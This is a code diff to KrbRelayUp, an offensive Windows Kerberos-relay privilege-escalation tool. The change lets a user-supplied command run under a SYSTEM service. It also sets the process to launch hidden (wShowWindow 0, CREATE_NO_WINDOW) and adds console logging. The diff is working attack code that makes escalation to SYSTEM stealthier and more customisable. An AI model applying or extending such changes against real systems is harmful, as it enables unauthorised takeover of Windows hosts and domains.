diff --git a/KrbRelayUp/KrbSCM.cs b/KrbRelayUp/KrbSCM.cs index e45a7b4..93e379c 100644 --- a/KrbRelayUp/KrbSCM.cs +++ b/KrbRelayUp/KrbSCM.cs @@ -44,12 +44,13 @@ public static void Run() int oInitializeSecurityContext = Marshal.OffsetOf(typeof(SecurityFunctionTable), "InitializeSecurityContext").ToInt32(); Marshal.Copy(bInitializeSecurityContext, 0, functionTable + oInitializeSecurityContext, bInitializeSecurityContext.Length); - if (String.IsNullOrEmpty(Options.serviceCommand)) + string exe = System.Reflection.Assembly.GetExecutingAssembly().Location; + int session_id = System.Diagnostics.Process.GetCurrentProcess().SessionId; + if(String.IsNullOrEmpty(Options.serviceCommand)) { - string exe = System.Reflection.Assembly.GetExecutingAssembly().Location; - int session_id = System.Diagnostics.Process.GetCurrentProcess().SessionId; - Options.serviceCommand = $"\"{exe}\" system {session_id}\n"; + Options.serviceCommand = "cmd.exe"; } + string spawnKrbrelaySystemCommand = $"\"{exe}\" system {session_id} \"" + Options.serviceCommand + "\""; IntPtr hScm = OpenSCManager("127.0.0.1", null, ScmAccessRights.Connect | ScmAccessRights.CreateService); @@ -59,7 +60,9 @@ public static void Run() return; } - IntPtr hService = CreateService(hScm, Options.serviceName, null, ServiceAccessRights.AllAccess, 0x10, ServiceBootFlag.DemandStart, ServiceError.Ignore, Options.serviceCommand, null, IntPtr.Zero, null, null, null); + Console.WriteLine($"[+] Service Name: {Options.serviceName}"); + + IntPtr hService = CreateService(hScm, Options.serviceName, null, ServiceAccessRights.AllAccess, 0x10, ServiceBootFlag.DemandStart, ServiceError.Ignore, spawnKrbrelaySystemCommand, null, IntPtr.Zero, null, null, null); if (hService == IntPtr.Zero) { @@ -91,7 +94,7 @@ public static void Run() Console.WriteLine("[+] Clean-up done"); } - public static void RunSystemProcess(int session_id) + public static void RunSystemProcess(int session_id, string cmdline) { IntPtr hToken = IntPtr.Zero; if (!OpenProcessToken((IntPtr)(-1), 0x0002, out hToken)) @@ -113,14 +116,15 @@ public static void RunSystemProcess(int session_id) Console.WriteLine($"[-] Error setting session ID: {Marshal.GetLastWin32Error()}"); return; } + STARTUPINFO start_info = new STARTUPINFO(); start_info.cb = Marshal.SizeOf(start_info); start_info.lpDesktop = "WinSta0\\Default"; - start_info.wShowWindow = 5; + start_info.wShowWindow = 0; + // string cmdline = "powershell.exe"; - string cmdline = "cmd.exe"; PROCESS_INFORMATION proc_info = new PROCESS_INFORMATION(); - if (!CreateProcessAsUser(hPrimaryToken, null, cmdline, ref s, ref s, false, 0x00000010, IntPtr.Zero, null, ref start_info, out proc_info)) + if (!CreateProcessAsUser(hPrimaryToken, null, cmdline, ref s, ref s, false, 0x08000000, IntPtr.Zero, null, ref start_info, out proc_info)) { Console.WriteLine($"[-] Error creating process: {Marshal.GetLastWin32Error()}"); return; diff --git a/KrbRelayUp/Program.cs b/KrbRelayUp/Program.cs index 7224b6b..952e8aa 100644 --- a/KrbRelayUp/Program.cs +++ b/KrbRelayUp/Program.cs @@ -234,11 +234,13 @@ static void Main(string[] args) ParseArgs(args); + Console.WriteLine($"[+] Command Line {Options.serviceCommand}"); + if (Options.phase == Options.PhaseType.System) { try { - KrbSCM.RunSystemProcess(Convert.ToInt32(args[1])); + KrbSCM.RunSystemProcess(Convert.ToInt32(args[1]), args[2]); } catch { } return; @@ -394,6 +396,9 @@ static void Main(string[] args) finalCommand = $"{finalCommand} --ServiceName \"{Options.serviceName}\""; if (!String.IsNullOrEmpty(Options.serviceCommand)) finalCommand = $"{finalCommand} --ServiceCommand \"{Options.serviceCommand}\""; + + Console.WriteLine($"[+] final command: {finalCommand}"); + Helpers.CreateProcessNetOnly(finalCommand, show: false, kirbiBytes: bFinalTicket); } else